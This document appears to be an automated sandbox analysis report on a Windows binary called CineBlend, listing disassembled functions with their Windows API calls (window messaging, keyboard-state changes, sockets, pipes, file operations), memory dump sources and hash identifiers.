GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BC2C79
_wcslen.LIBCMT ref: 00BC2CAF
GetMenuItemID.USER32(?,?), ref: 00BC2CE9
GetSubMenu.USER32(?,?), ref: 00BC2CF7

Part of subcall function 00B94393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B943AD
Part of subcall function 00B94393: GetCurrentThreadId.KERNEL32 ref: 00B943B4
Part of subcall function 00B94393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B92F00), ref: 00B943BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BC2D7F

Part of subcall function 00B9F292: Sleep.KERNEL32 ref: 00B9F30A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 2bba562076c880d8ed6ed620c8ba561e0d9f48485468493b01cba55cea231fd0
Instruction ID: fe68b007e3e3119cf0e3790866509ccb377fbb414bf4fd488b98c48ef406c666
Opcode Fuzzy Hash: 2bba562076c880d8ed6ed620c8ba561e0d9f48485468493b01cba55cea231fd0
Instruction Fuzzy Hash: AF714A75A00215AFCB14EF64C885FAEBBF5EF58310F1484A9E816EB351DB34AD418B90

Function 00BC88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00BC8992
IsWindowEnabled.USER32(00000000), ref: 00BC899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00BC8A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00BC8AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00BC8AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00BC8B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BC8B1E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 86eba3c1fa4b3335ce0a4b57be4ffbe229880213b56e2557caf967700c9ba61c
Instruction ID: b9795d9d433f2b6761480d7813b9b39c1d3e0bdfd3b30d1879fd2270e51e775e
Opcode Fuzzy Hash: 86eba3c1fa4b3335ce0a4b57be4ffbe229880213b56e2557caf967700c9ba61c
Instruction Fuzzy Hash: FF719B74604604AFEB21DF64C884FBABBF9EF4A300F1414AEF845A7261CB71AD81DB51

Function 00B9B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B9B8C0
GetKeyboardState.USER32(?), ref: 00B9B8D5
SetKeyboardState.USER32(?), ref: 00B9B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00B9B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00B9B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00B9B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B9B9E7

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 69618670736d39e2bc2fe74fb090f1b38f87bf21cd1432b5d0c9c27aefae4f1c
Instruction ID: 96000fe491fb736a71e37a6cb26b81db8485e9f2c78811683c24db4ab9a38f0e
Opcode Fuzzy Hash: 69618670736d39e2bc2fe74fb090f1b38f87bf21cd1432b5d0c9c27aefae4f1c
Instruction Fuzzy Hash: 6251EEA06187D53EFF3642349D45FBABEE99B06304F0884E9E1D9468D2C7E8ACC4D760

Function 00B9B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B9B6E0
GetKeyboardState.USER32(?), ref: 00B9B6F5
SetKeyboardState.USER32(?), ref: 00B9B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B9B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B9B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B9B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B9B7FF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9eff1afffaedd401790cc39954e3839b422a29cbe1d07a171f445e1a648c500a
Instruction ID: 258c1fdc2fee90de9ffa0f6c3049e91abe7aa41ee4fb933521888b265bc39c36
Opcode Fuzzy Hash: 9eff1afffaedd401790cc39954e3839b422a29cbe1d07a171f445e1a648c500a
Instruction Fuzzy Hash: FD51F3A09087D53EFF3283649D95F76BEE9DB46304F0885E9E0D54A8D2D398EC84E760

Function 00B657A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00B65F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00B657E3
__fassign.LIBCMT ref: 00B6585E
__fassign.LIBCMT ref: 00B65879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00B6589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00B65F16,00000000,?,?,?,?,?,?,?,?,?,00B65F16,?), ref: 00B658BE
WriteFile.KERNEL32(?,?,00000001,00B65F16,00000000,?,?,?,?,?,?,?,?,?,00B65F16,?), ref: 00B658F7

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 0a14cb60cf0d0c6b7a18f0b6b5bf4bd4636bbe1d621fedcf707d7d72f42dcc18
Instruction ID: da1a5b71c16e65b551f44a0b71b9ef71cfa80620aa17e3c01cc1c2fa7977d771
Opcode Fuzzy Hash: 0a14cb60cf0d0c6b7a18f0b6b5bf4bd4636bbe1d621fedcf707d7d72f42dcc18
Instruction Fuzzy Hash: C751C371A00649DFDB20CFA8DC85BEEBBF8EF09310F1441AAE955E7291D734A951CB60

Function 00B53090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B530BB
___except_validate_context_record.LIBVCRUNTIME ref: 00B530C3
_ValidateLocalCookies.LIBCMT ref: 00B53151
__IsNonwritableInCurrentImage.LIBCMT ref: 00B5317C
_ValidateLocalCookies.LIBCMT ref: 00B531D1

Strings

csm, xrefs: 00B53166

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3e35717cd0e49e7fa7ce41a35bed74164e2314278be66e67ec9061f17fd595d6
Instruction ID: d495f52475f88d2129d339236634935d999f518b135e7e549a1e788815818fab
Opcode Fuzzy Hash: 3e35717cd0e49e7fa7ce41a35bed74164e2314278be66e67ec9061f17fd595d6
Instruction Fuzzy Hash: 60418334A002089BCF10DF68C885BAEBBF5EF44B95F1481D5EC156B392D7319B09CB91

Function 00BB1B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BB3AD7
Part of subcall function 00BB3AAB: _wcslen.LIBCMT ref: 00BB3AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BB1B6F
WSAGetLastError.WSOCK32 ref: 00BB1B7E
WSAGetLastError.WSOCK32 ref: 00BB1C26
closesocket.WSOCK32(00000000), ref: 00BB1C56

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 14dcb582a75c33e87a15d43ab20e5cde13044762ad02ceb628dba906435450c6
Instruction ID: 7fa9ea7d5ca5c1ad2f2cd5fe63edc8510b53a84863040f2ac3429a374343a8ad
Opcode Fuzzy Hash: 14dcb582a75c33e87a15d43ab20e5cde13044762ad02ceb628dba906435450c6
Instruction Fuzzy Hash: DB41F671600504AFDB109F28C885FF9BBE9EF45324F5484A9F8159B292DBB0ED41CBE1

Function 00B9D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B9D7CD,?), ref: 00B9E714

Part of subcall function 00B9E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B9D7CD,?), ref: 00B9E72D

lstrcmpiW.KERNEL32(?,?), ref: 00B9D7F0
MoveFileW.KERNEL32(?,?), ref: 00B9D82A
_wcslen.LIBCMT ref: 00B9D8B0
_wcslen.LIBCMT ref: 00B9D8C6
SHFileOperationW.SHELL32(?), ref: 00B9D90C

Strings

\*.*, xrefs: 00B9D89E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: fee18e8b9432fd22957ddc401f85245df38b8f546332df28056540933a3ce273
Instruction ID: 3859d59937b7552197d57f8f87cdbb08cd96a3f29ccc7a80269603428298263c
Opcode Fuzzy Hash: fee18e8b9432fd22957ddc401f85245df38b8f546332df28056540933a3ce273
Instruction Fuzzy Hash: 07414E719052189ADF12EFA5C981BDE77F8EF08340F1004FAA609EB152EA34A788CB54

Function 00BC3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00BC38B8
GetWindowLongW.USER32(?,000000F0), ref: 00BC38EB
GetWindowLongW.USER32(?,000000F0), ref: 00BC3920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00BC3952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00BC397C
GetWindowLongW.USER32(?,000000F0), ref: 00BC398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BC39A7

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: e8e6fbf0b8f613518f0448b8b3aa52b7a6d54c7c49fe43f65c88b9f156d19b74
Instruction ID: 0e28103097c8aef0e6362ada5d90eaf4f8d3f23860b6cd98b64e23a1d027eadb
Opcode Fuzzy Hash: e8e6fbf0b8f613518f0448b8b3aa52b7a6d54c7c49fe43f65c88b9f156d19b74
Instruction Fuzzy Hash: 3A311234704255AFDB218F48DC89F6837E1FB8AB20F5581A8F5118B2B1CBB1AD84DB11

Function 00B9808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B980D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B980F6
SysAllocString.OLEAUT32(00000000), ref: 00B980F9
SysAllocString.OLEAUT32(?), ref: 00B98117
SysFreeString.OLEAUT32(?), ref: 00B98120
StringFromGUID2.OLE32(?,?,00000028), ref: 00B98145
SysAllocString.OLEAUT32(?), ref: 00B98153

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f5dd86329255f41d7daaa1c66bc94d0616d90af523d6e988bc7b2fbe15089045
Instruction ID: 6c974ae736408855729a243909734315986ebec76c32a09cccad51a47c48c2b1
Opcode Fuzzy Hash: f5dd86329255f41d7daaa1c66bc94d0616d90af523d6e988bc7b2fbe15089045
Instruction Fuzzy Hash: 70219576600219AF9F10DFA8CC88DBA77ECEB0E3607048475FA05EB290DA74DC468760

Function 00B98164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B981A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B981CF
SysAllocString.OLEAUT32(00000000), ref: 00B981D2
SysAllocString.OLEAUT32 ref: 00B981F3
SysFreeString.OLEAUT32 ref: 00B981FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00B98216
SysAllocString.OLEAUT32(?), ref: 00B98224

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 883096b7694558f7e73a795f122d57b2d51c15b9b9dce98544dd47d2537c4e43
Instruction ID: 27295e24f6543912452d5b906926ac50d2092ae4914a09429705a20f46f6f130
Opcode Fuzzy Hash: 883096b7694558f7e73a795f122d57b2d51c15b9b9dce98544dd47d2537c4e43
Instruction Fuzzy Hash: D2214F75604614BF9F14AFA8DC89DAA77ECEB0E3607048175FA05DB2A1DE70EC42CB64

Function 00BA0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00BA0E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BA0ED5

Strings

nul, xrefs: 00BA0F0E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 63c15e1e843d319bb35fdad17538461fa16a53b96a065b75fdaf9c8abcc1355d
Instruction ID: 46c915525d4a6f5e4505907f49bfab3738d0a02535b3a689af54cbdcf55b5263
Opcode Fuzzy Hash: 63c15e1e843d319bb35fdad17538461fa16a53b96a065b75fdaf9c8abcc1355d
Instruction Fuzzy Hash: 3F218274518309AFDB20AF24DC44A9A77E8FF56320F204AA9FCA5E71D0D7729841DB50

Function 00BA0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00BA0F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BA0FA8

Strings

nul, xrefs: 00BA0FE0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 9f3c4cbedbb6fa65865bceb1e2172999f2a55fd86b94d4ba61052067466658b8
Instruction ID: a9ba025e59baf7ed2f48f59abb1196b20f27fcd39d9df004fee228a3b7f54365
Opcode Fuzzy Hash: 9f3c4cbedbb6fa65865bceb1e2172999f2a55fd86b94d4ba61052067466658b8
Instruction Fuzzy Hash: 6F21A475508345DFDB309F68CC44A9AB7E8FF56720F200AAAF9A1E72D0DB719881DB50

Function 00BC4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B37873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B378B1
Part of subcall function 00B37873: GetStockObject.GDI32(00000011), ref: 00B378C5
Part of subcall function 00B37873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B378CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BC4BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BC4BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BC4BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BC4BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BC4BE3

Strings

Msctls_Progress32, xrefs: 00BC4B81

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 596d8351bcf49dd7f01efbf43cc9e0bc4843ed86ba55f866d84a70a1bd7657f8
Instruction ID: 16b0d4de6b13d48a8ec9c64ac48e49294dee42dab5ce6db821484175448c5967
Opcode Fuzzy Hash: 596d8351bcf49dd7f01efbf43cc9e0bc4843ed86ba55f866d84a70a1bd7657f8
Instruction Fuzzy Hash: 9B1151B6550219BEEF119E65CC85FEB7FADEF08758F014111B618A60A0CB72DC21DBA4

Function 00B6DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B6DB23: _free.LIBCMT ref: 00B6DB4C

_free.LIBCMT ref: 00B6DBAD

Part of subcall function 00B62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?), ref: 00B62D4E
Part of subcall function 00B62D38: GetLastError.KERNEL32(?,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?,?), ref: 00B62D60

_free.LIBCMT ref: 00B6DBB8
_free.LIBCMT ref: 00B6DBC3
_free.LIBCMT ref: 00B6DC17
_free.LIBCMT ref: 00B6DC22
_free.LIBCMT ref: 00B6DC2D
_free.LIBCMT ref: 00B6DC38

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: 78aaf91b24947606e3b93d16d9dbe970f773f9e40a516d5ccbddd9ffc23053d8
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 54113072A41B04BAE620BBB0CC07FDB77DCAF15700F454CE9B299EA252DA7DB5058750

Function 00B9E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B9E328
LoadStringW.USER32(00000000), ref: 00B9E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B9E345
LoadStringW.USER32(00000000), ref: 00B9E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B9E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B9E36D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
